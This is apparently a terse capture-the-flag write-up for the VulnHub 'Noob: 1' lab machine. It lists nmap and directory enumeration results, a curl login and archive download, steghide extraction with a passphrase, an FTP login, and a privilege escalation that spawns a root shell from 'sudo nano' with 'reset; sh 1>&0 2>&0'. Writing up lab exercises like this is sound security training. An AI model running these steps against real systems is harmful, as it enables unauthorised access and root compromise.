Name
VulnHub | Noob: 1
Writer
0x64azana
Genre
Enumeration
NMAP-RESULTS:
21/tcp open ftp vsftpd 3.0.380/tcp open http Apache httpd 2.4.29 ((Ubuntu))
55077/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
SUBDIR-ENUMS:
N/A
DIR-ENUMERATIONS:
/go.php (Status: 200) [Size: 0]/index.php (Status: 302) [Size: 0] [--> index.html]
/logout.php (Status: 302) [Size: 0] [--> index.html]
/server-status (Status: 403) [Size: 278]
Exploitation:
1. curl -c cookies.txt -d "username=champ&password=password" -X POST http://192.168.2.253/go.php && curl -b cookies.txt -O http://192.168.2.253/downloads.rar2. unrar e downloads.rar
3. steghide extract -sf funny.bmp -p sudo
4. cat user.txt
5. rot13 user.txt
6. ftp wtf@192.168.2.253
7. > this one is a simple one
PRIV-ESC:
# AS N00B[wtf] THROUGH SSHsudo nano
^R^X
reset; sh 1>&0 2>&0